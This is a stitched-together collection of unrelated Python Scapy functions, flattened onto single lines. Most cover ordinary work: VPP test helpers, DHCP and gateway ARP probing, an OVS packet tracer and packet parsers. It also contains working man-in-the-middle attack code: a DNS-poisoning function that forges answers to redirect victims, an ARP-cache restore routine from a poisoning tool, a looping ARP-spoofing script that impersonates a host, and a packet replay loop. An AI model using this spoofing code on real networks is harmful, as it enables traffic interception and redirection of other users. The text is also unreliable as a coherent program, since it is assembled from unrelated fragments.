def send_frame(self, frame_body): PACKET = Ether() PACKET.length = 64 PACKET.dst = self.dst PACKET.src = self.getHwAddr(self.interface) if self.stag: # WARNING: September/2016: This should be 0x88a8, but the Intel 10G # hardware I am currently using does not support receiving a TPID of # 0x88a8. So, I send double CTAGs, and I usually set this to 0x8100. # (NOTE: The Intel hardware can send a TPID of 0x88a8) PACKET.type = 0x8100 if self.ctag: PACKET/=Dot1Q(type=0x8100,vlan=int(self.stag)) PACKET/=Dot1Q(type=self.etype,vlan=int(self.ctag)) else: PACKET/=Dot1Q(type=self.etype,vlan=int(self.stag)) else: if self.ctag: PACKET.type = 0x8100 PACKET/=Dot1Q(type=self.etype,vlan=int(self.ctag)) else: PACKET.type = self.etype # PACKET/=Dot1Q(type=self.etype, vlan=int(self.ctag)) PACKET/=SlowProtocolsSubtype()/FlagsBytes()/OAMPDU() PACKET/=frame_body PACKET/=EndOfPDU() if (self.verbose == True): PACKET.show() print '###[ Frame Length %d (before padding) ]###' % len(PACKET) if (self.hexdump == True): print hexdump(PACKET) if (self.dryrun != True): sendp(PACKET, iface=self.interface, verbose=self.verbose) time.sleep(self.sleep) return PACKET
def srp_packet(self, packet_bytes, iface): decrypted = self.key.decrypt(packet_bytes) packet = Ether(decrypted) # This check makes sure to not forward local loopback heartbeat packets if not packet[Ether].type == 0x9000: print(RED + "PACKET RECIEVED, FORWARDING TO DCNET" + RESET) packet.show()
def send_dns_poison(host_mac: str, host_ip: str, received_packet: packet): dnsrr = DNSRR() dnsrr[DNSRR].rrname = received_packet[DNSQR].qname dnsrr[DNSRR].type = 'A' dnsrr[DNSRR].rclass = received_packet[DNSQR].qclass dnsrr[DNSRR].ttl = 86400 dnsrr[DNSRR].rdata = settings['redirect spoofed domains to'] dns = Ether() / IP() / UDP() / DNS() dns[Ether].src = attacker_mac dns[Ether].dst = host_mac dns[IP].dst = host_ip dns[IP].src = received_packet[IP].dst dns[UDP].dport = received_packet[UDP].sport dns[UDP].sport = received_packet[UDP].dport dns[DNS].id = received_packet[DNS].id dns[DNS].ancount = 1 dns[DNS].qr = 1 dns[DNS].rd = 1 dns[DNS].qd = received_packet[DNS].qd dns[DNS].an = dnsrr if settings['show debug']: dns.show() sendp(dns, iface=interface, verbose=settings['show debug']) if settings['show dns spoof']: print('Spoofed DNS request from ' + host_ip + ' for ' + dns[DNSQR].qname.decode()[:-1])
def sendEthMsg(dest_hw_addr, msg): eth = Ether(type=0x800, dst=dest_hw_addr, src=get_if_hwaddr(conf.iface)) raw_payload = Raw(load=str(msg)) eth.add_payload(raw_payload) if(debug): print("\nsend eth header\n") eth.show() # send packet using socked on conf.iface, which is default interface (h1x1-eth0, etc) sendp(eth, iface=conf.iface)
def __handle_pkt (self, pkt): pkt_bin = base64.b64decode(pkt['binary']) pkt_scapy = Ether(pkt_bin) self.logger.info(format_text('\n\n#{} Port: {} {}\n'.format(pkt['index'], pkt['port'], self.format_origin(pkt['origin'])), 'bold', '')) self.logger.info(format_text(' Type: {}, Size: {} B, TS: {:.2f} [sec]\n'.format(self.get_scapy_name(pkt_scapy), len(pkt_bin), pkt['ts'] - self.start_ts), 'bold')) if self.is_brief: self.logger.info(' {0}'.format(pkt_scapy.command())) else: pkt_scapy.show(label_lvl = ' ') self.logger.info('') return len(pkt_bin)
def send_arp_restore(dst_mac, dst_ip, src_mac, src_ip): arp = Ether() / ARP() arp[Ether].src = attacker_mac arp[Ether].dst = dst_mac arp[ARP].hwsrc = src_mac arp[ARP].psrc = src_ip arp[ARP].hwdst = dst_mac arp[ARP].pdst = dst_ip arp[ARP].op = 'is-at' if settings['show debug']: arp.show() sendp(arp, iface=interface, verbose=settings['show debug']) if settings['show arp poison']: print('Restored ARP cache of ' + dst_ip + ', not pretending to be ' + src_ip)
def resolve_ndp(self, pg_interface=None): """Resolve NDP using provided packet-generator interface :param pg_interface: interface used to resolve, if None then this interface is used """ if pg_interface is None: pg_interface = self info("Sending NDP request for %s on port %s" % (self.local_ip6, pg_interface.name)) ndp_req = self.create_ndp_req() pg_interface.add_stream(ndp_req) pg_interface.enable_capture() self.test.pg_start() info(self.test.vapi.cli("show trace")) ndp_reply = pg_interface.get_capture() if ndp_reply is None or len(ndp_reply) == 0: info("No NDP received on port %s" % pg_interface.name) return ndp_reply = ndp_reply[0] # Make Dot1AD packet content recognizable to scapy if ndp_reply.type == 0x88a8: ndp_reply.type = 0x8100 ndp_reply = Ether(str(ndp_reply)) try: ndp_na = ndp_reply[ICMPv6ND_NA] opt = ndp_na[ICMPv6NDOptDstLLAddr] info("VPP %s MAC address is %s " % (self.name, opt.lladdr)) self._local_mac = opt.lladdr except: error("Unexpected response to NDP request:") error(ndp_reply.show()) raise
def send_dhcp_packet(self, mac: MacAddress, vlan: str, state: DHCPState, dhcp_desc: DHCPDescriptor = None): """ Send DHCP packet and record state in dhcp_client_state. Args: mac: MAC address of interface state: state of DHCP packet dhcp_desc: DHCP protocol state. Returns: """ ciaddr = None # generate DHCP request packet if state == DHCPState.DISCOVER: dhcp_opts = [("message-type", "discover")] dhcp_desc = DHCPDescriptor(mac=mac, ip="", vlan=vlan, state_requested=DHCPState.DISCOVER) self._msg_xid = self._msg_xid + 1 pkt_xid = self._msg_xid elif state == DHCPState.REQUEST: dhcp_opts = [("message-type", "request"), ("requested_addr", dhcp_desc.ip), ("server_id", dhcp_desc.server_ip)] dhcp_desc.state_requested = DHCPState.REQUEST pkt_xid = dhcp_desc.xid ciaddr = dhcp_desc.ip elif state == DHCPState.RELEASE: dhcp_opts = [("message-type", "release"), ("server_id", dhcp_desc.server_ip)] dhcp_desc.state_requested = DHCPState.RELEASE self._msg_xid = self._msg_xid + 1 pkt_xid = self._msg_xid ciaddr = dhcp_desc.ip else: LOG.warning("Unknown egress request mac %s state %s", str(mac), state) return dhcp_opts.append("end") dhcp_desc.xid = pkt_xid with self._dhcp_notify: self.dhcp_client_state[mac.as_redis_key(vlan)] = dhcp_desc pkt = Ether(src=str(mac), dst="ff:ff:ff:ff:ff:ff") if vlan and vlan != "0": pkt /= Dot1Q(vlan=int(vlan)) pkt /= IP(src="0.0.0.0", dst="255.255.255.255") pkt /= UDP(sport=68, dport=67) pkt /= BOOTP(op=1, chaddr=mac.as_hex(), xid=pkt_xid, ciaddr=ciaddr) pkt /= DHCP(options=dhcp_opts) LOG.debug("DHCP pkt xmit %s", pkt.show(dump=True)) sendp(pkt, iface=self._dhcp_interface, verbose=0)
def sendProbes(): dstAddr = "10.0.2.22" iface = "H11-eth0" print "sending probes on interface %s to %s" % (iface, dstAddr) port_list = [4, 2, 4, 1, 1] pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') / IP() / UDP(dport=PORT_FWD) for port in port_list[:-1]: pkt /= FWD_Label(outport=port, tos=0) pkt /= FWD_Label(outport=port_list[-1], tos=1) pkt /= TMY_Proto_Header(proto=0xff) pkt /= TMY_INST_Label(switch_id=6, bit_egress_port=1, tos=1) pkt /= TMY_DATA_Header(label_cnt=0) # pkt /= TMY_INST_Label(switch_id=6, bit_ingress_port=1, tos=1) pkt.show() # sendpfast(pkt, pps=2, loop=200, file_cache=True, iface=iface) sendp(pkt, iface=iface)
def dfSeriesToPacket(self, series): series.tolist() bytes = "" label = series[0] enumerate = series[1:] for i in enumerate: bytes += chr(int(round(float(i) * 255))) if (label == "ARP"): packet = Ether(bytes) elif (label == "ICMP"): packet = IP(bytes) packet.time = 0 packet[ICMP].time = 0 if (packet[ICMP].type == 13 or packet[ICMP].type == "timestamp-request" or packet[ICMP].type == 14 or packet[ICMP].type == "timestamp-reply"): packet.show() elif (label[0:4] == "IPv6"): packet = IPv6(bytes) else: packet = IP(bytes) packet.time = 0 if TCP in packet: packet[TCP].time = 0 for i in xrange(len(packet[TCP].options)): if (packet[TCP].options[i][0] == "Timestamp"): packet[TCP].options[i] = ("Timestamp", (0, 0)) packet[TCP].seq = 0 packet[TCP].ack = 0 elif UDP in packet: packet.time = 0 packet[UDP].time = 0 elif ICMP in packet: packet = IP(bytes) packet.time = 0 packet[ICMP].time = 0 else: packet = IP(bytes) packet.show() packet.time = 0 return label, packet
def bytesModifyBytes(self, X, Y): bytes = "" enumerate = X.split(',') for i in enumerate: bytes += chr(int(round(float(i) * 255))) if (Y == "ARP"): packet = Ether(bytes) elif (Y == "ICMP"): packet = IP(bytes) packet.time = 0 packet[ICMP].time = 0 if (packet[ICMP].type == 13 or packet[ICMP].type == "timestamp-request" or packet[ICMP].type == 14 or packet[ICMP].type == "timestamp-reply"): packet.show() elif (Y[0:4] == "IPv6"): packet = IPv6(bytes) else: packet = IP(bytes) packet.time = 0 if TCP in packet: packet[TCP].time = 0 for i in xrange(len(packet[TCP].options)): if (packet[TCP].options[i][0] == "Timestamp"): packet[TCP].options[i] = ("Timestamp", (0, 0)) packet[TCP].seq = 0 packet[TCP].ack = 0 elif UDP in packet: packet.time = 0 packet[UDP].time = 0 elif ICMP in packet: packet = IP(bytes) packet.time = 0 packet[ICMP].time = 0 else: packet = IP(bytes) packet.show() packet.time = 0 return self.packetToBytes(packet)
def _get_gw_mac_address(self, ip: IPAddress, vlan: str = "") -> str: try: gw_ip = ipaddress.ip_address(ip.address) self.logger.debug("sending arp via egress: %s", self.config.non_nat_arp_egress_port) eth_mac_src = get_if_hwaddr(self.config.non_nat_arp_egress_port) psrc = "0.0.0.0" egress_port_ip = get_if_addr(self.config.non_nat_arp_egress_port) if egress_port_ip: psrc = egress_port_ip pkt = Ether(dst=ETHER_BROADCAST, src=eth_mac_src) if vlan.isdigit(): pkt /= Dot1Q(vlan=int(vlan)) pkt /= ARP(op="who-has", pdst=gw_ip, hwsrc=eth_mac_src, psrc=psrc) self.logger.debug("ARP Req pkt %s", pkt.show(dump=True)) res = srp1(pkt, type=ETH_P_ALL, iface=self.config.non_nat_arp_egress_port, timeout=1, verbose=0, nofilter=1, promisc=0) if res is not None: self.logger.debug("ARP Res pkt %s", res.show(dump=True)) if str(res[ARP].psrc) != str(gw_ip): self.logger.warning( "Unexpected IP in ARP response. expected: %s pkt: %s", str(gw_ip), res.show(dump=True)) return "" if vlan.isdigit(): if Dot1Q in res and str(res[Dot1Q].vlan) == vlan: mac = res[ARP].hwsrc else: self.logger.warning( "Unexpected vlan in ARP response. expected: %s pkt: %s", vlan, res.show(dump=True)) return "" else: mac = res[ARP].hwsrc return mac else: self.logger.debug("Got Null response") return "" except Scapy_Exception as ex: self.logger.warning("Error in probing Mac address: err %s", ex) return "" except ValueError: self.logger.warning("Invalid GW Ip address: [%s] or vlan %s", str(ip), vlan) return ""
def getDNSPacket(self): """ 构造DNS报文 :return: """ try: dns = DNS() dns.id = int(self.entries[0].get()) dns.qr = int(self.entries[1].get()) dns.opcode = int(self.entries[2].get()) dns.rd = int(self.entries[3].get()) dns.qd = DNSQR(qname=self.entries[4].get()) udp = UDP() ip = IP() ip.dst = self.entries[5].get() dns_packet = Ether() / ip / udp / dns dns_packet.show() self.resultText.insert('end', dns_packet.summary() + '\n') self.resultText.insert('end', str(dns_packet) + '\n') return dns_packet except Exception as e: print(e.with_traceback()) finally: pass
def _get_gw_mac_address(self, ip: IPv4Address) -> str: try: gw_ip = ipaddress.ip_address(ip.address) self.logger.debug("sending arp via egress: %s", self.config.non_nat_arp_egress_port) eth_mac_src = get_if_hwaddr(self.config.non_nat_arp_egress_port) psrc = "0.0.0.0" egress_port_ip = get_if_addr(self.config.non_nat_arp_egress_port) if egress_port_ip: psrc = egress_port_ip pkt = Ether(dst=ETHER_BROADCAST, src=eth_mac_src) pkt /= ARP(op="who-has", pdst=gw_ip, hwsrc=eth_mac_src, psrc=psrc) self.logger.debug("ARP Req pkt %s", pkt.show(dump=True)) res = srp1(pkt, type=ETH_P_ARP, iface=self.config.non_nat_arp_egress_port, timeout=1, verbose=0, nofilter=1, promisc=0) if res is not None: self.logger.debug("ARP Res pkt %s", res.show(dump=True)) mac = res[ARP].hwsrc return mac else: self.logger.debug("Got Null response") return "" except Scapy_Exception as ex: self.logger.warning("Error in probing Mac address: err %s", ex) return "" except ValueError: self.logger.warning("Invalid GW Ip address: [%s]", ip) return ""
def resolve_arp(self, pg_interface=None): """Resolve ARP using provided packet-generator interface :param pg_interface: interface used to resolve, if None then this interface is used """ if pg_interface is None: pg_interface = self info("Sending ARP request for %s on port %s" % (self.local_ip4, pg_interface.name)) arp_req = self.create_arp_req() pg_interface.add_stream(arp_req) pg_interface.enable_capture() self.test.pg_start() info(self.test.vapi.cli("show trace")) arp_reply = pg_interface.get_capture() if arp_reply is None or len(arp_reply) == 0: info("No ARP received on port %s" % pg_interface.name) return arp_reply = arp_reply[0] # Make Dot1AD packet content recognizable to scapy if arp_reply.type == 0x88a8: arp_reply.type = 0x8100 arp_reply = Ether(str(arp_reply)) try: if arp_reply[ARP].op == ARP.is_at: info("VPP %s MAC address is %s " % (self.name, arp_reply[ARP].hwsrc)) self._local_mac = arp_reply[ARP].hwsrc else: info("No ARP received on port %s" % pg_interface.name) except: error("Unexpected response to ARP request:") error(arp_reply.show()) raise
for z in range(32): value_ += 1 * 10000000 value = value_ value = value_ * -1 # if count % 2 == 1 : # value = value_ * -1 pkt = pkt / ENTRY(value=value) else: for z in range(32): value_ += 1 * 10000000 value = value_ # if count % 2 == 1 : # value = value_ * -1 pkt = pkt / ENTRY(value=value) pkt.show() print(hexdump(pkt)) print(len(pkt)) count += 1 print(count) sendp(pkt, iface=args.i) seg_number += 1 # data1 = Ether(dst=MACS[sys.argv[2]]) / IP(dst="10.10.0.1") / UDP(dport=10000) / PREAMBLE(number_of_entries=4,seg_number=1) / ENTRY(key=1,value=1) / ENTRY(key="b",value=2) / ENTRY(key="c",value=3) / ENTRY(key="d",value=4)/ ENTRY(key="d",value=5) / ENTRY(key="d",value=6) / ENTRY(key="d",value=7) / ENTRY(key="d",value=8) / ENTRY(key="d",value=9) / ENTRY(key="d",value=10) # data2 = Ether(dst=MACS[sys.argv[2]]) / IP(dst="10.0.1.10") / UDP(dport=10000) / PREAMBLE(number_of_entries=2,tree_id=2) / ENTRY(key='AA',value=5) / ENTRY(key="BB",value=6) # for i in range(int(sys.argv[3])): # sendp(data2, iface = sys.argv[1]) # PACKET TO SKIP
import sys from scapy.layers.l2 import Ether, ARP, sendp from scapy.layers.l2 import getmacbyip if __name__ == '__main__': if len(sys.argv) < 3: sys.exit(1) target_ip = sys.argv[1] host = sys.argv[2] target_mac = getmacbyip(target_ip) host_mac = getmacbyip(host) pkt = Ether() / ARP( op='is-at', psrc=host, pdst=target_ip, hwdst=target_mac) print(pkt.show()) try: sendp(pkt, inter=2, loop=1) except KeyboardInterrupt: print('Cleaning...') sendp(Ether(src=host_mac) / ARP(op='is-at', psrc=host, hwsrc=host_mac, pdst=target_ip, hwdst=target_mac), inter=1, count=3)
# pkt_analyzer = PacketAnalyzer(False) print("Daemon created\n") # pkt_raw_list = db.read_all_pkt_raw() # pkt_features_list = db.read_all_pkt_features() id_list = [2] pkt_raw_list = [] # fp = fopen('length_pkt.pcap') for id in id_list: pkt_raw = db.read_raw_by_id(id) print (parse_packet(Ether(pkt_raw[2]))) pkt_raw_list.append(pkt_raw[2]) eth_pkt = Ether(pkt_raw[2]) eth_pkt.show() print("IP chk", eth_pkt[IP].chksum) print(eth_pkt[UDP].chksum) #CHange IP eth_pkt[IP].dst = "192.168.101.106" # Recompute chksum del eth_pkt[IP].chksum del eth_pkt[UDP].chksum eth_pkt.show2(dump=False) sendp(eth_pkt, iface='eth2', count = 10000, inter=0.001)#, return_packets = True) # Write the list to pcap # write(pkt_raw_list)
def extract_one_packet(buf): """Extract one packet from the incoming buf buffer. Takes string as input and looks for first whole packet in it. If it finds one, it returns substring from the buf parameter. :param buf: String representation of incoming packet buffer. :type buf: str :returns: String representation of first packet in buf. :rtype: str """ pkt_len = 0 if len(buf) < 60: return None try: ether_type = Ether(buf[0:14]).type except AttributeError: raise RuntimeError(f"No EtherType in packet {buf!r}") if ether_type == ETH_P_IP: # 14 is Ethernet fame header size. # 4 bytes is just enough to look for length in ip header. # ip total length contains just the IP packet length so add the Ether # header. pkt_len = Ether(buf[0:14 + 4]).len + 14 if len(buf) < 60: return None elif ether_type == ETH_P_IPV6: if not Ether(buf[0:14 + 6]).haslayer(IPv6): raise RuntimeError(f"Invalid IPv6 packet {buf!r}") # ... to add to the above, 40 bytes is the length of IPV6 header. # The ipv6.len only contains length of the payload and not the header pkt_len = Ether(buf)[u"IPv6"].plen + 14 + 40 if len(buf) < 60: return None elif ether_type == ETH_P_ARP: pkt = Ether(buf[:20]) if not pkt.haslayer(ARP): raise RuntimeError(u"Incomplete ARP packet") # len(eth) + arp(2 hw addr type + 2 proto addr type # + 1b len + 1b len + 2b operation) pkt_len = 14 + 8 pkt_len += 2 * pkt.getlayer(ARP).hwlen pkt_len += 2 * pkt.getlayer(ARP).plen del pkt elif ether_type == 32821: # RARP (Reverse ARP) pkt = Ether(buf[:20]) pkt.type = ETH_P_ARP # Change to ARP so it works with scapy pkt = Ether(pkt) if not pkt.haslayer(ARP): pkt.show() raise RuntimeError(u"Incomplete RARP packet") # len(eth) + arp(2 hw addr type + 2 proto addr type # + 1b len + 1b len + 2b operation) pkt_len = 14 + 8 pkt_len += 2 * pkt.getlayer(ARP).hwlen pkt_len += 2 * pkt.getlayer(ARP).plen del pkt else: raise RuntimeError(f"Unknown protocol {ether_type}") if pkt_len < 60: pkt_len = 60 if len(buf) < pkt_len: return None return buf[0:pkt_len]
def print_event(ctx, data, size): event = b['events'].event(data) print("{:<18.9f} {:<4} {:<16} {:<10} {:<32} {:<4} {:<10} {:<10}".format( event.ts / 1000000000, event.cpu, event.comm.decode("utf-8"), event.pid, event.dpif_name.decode("utf-8"), event.upcall_type, event.pkt_size, event.key_size)) # # Dump flow key information # if event.key_size < options.flow_key_size: key_len = event.key_size else: key_len = options.flow_key_size if options.flow_key_decode != 'none': print(" Flow key size {} bytes, size captured {} bytes.".format( event.key_size, key_len)) if options.flow_key_decode == 'hex': # # Abuse scapy's hex dump to dump flow key # print( re.sub('^', ' ' * 4, hexdump(Ether(bytes(event.key)[:key_len]), dump=True), flags=re.MULTILINE)) if options.flow_key_decode == 'nlraw': nla = decode_nlm(bytes(event.key)[:key_len]) else: nla = decode_nlm(bytes(event.key)[:key_len], dump=False) if "OVS_KEY_ATTR_IN_PORT" in nla: port = struct.unpack("=I", nla["OVS_KEY_ATTR_IN_PORT"])[0] else: port = "Unknown" # # Decode packet only if there is data # if event.pkt_size <= 0: return pkt_id = get_pkt_id() if event.pkt_size < options.packet_size: pkt_len = event.pkt_size pkt_data = bytes(event.pkt)[:event.pkt_size] else: pkt_len = options.packet_size pkt_data = bytes(event.pkt) if options.packet_decode != 'none' or options.pcap is not None: print(" {}: Receive dp_port {}, packet size {} bytes, size " "captured {} bytes.".format(pkt_id, port, event.pkt_size, pkt_len)) if options.packet_decode == 'hex': print( re.sub('^', ' ' * 4, hexdump(pkt_data, dump=True), flags=re.MULTILINE)) packet = Ether(pkt_data) packet.wirelen = event.pkt_size if options.packet_decode == 'decode': print(re.sub('^', ' ' * 4, packet.show(dump=True), flags=re.MULTILINE)) if options.pcap is not None: wrpcap(options.pcap, packet, append=True, snaplen=options.packet_size)
def getScapyFrame(self): scapyEthernetFrame = Ether(src=self.src, dst=self.dst, type=self.type) scapyEthernetFrame.show() return scapyEthernetFrame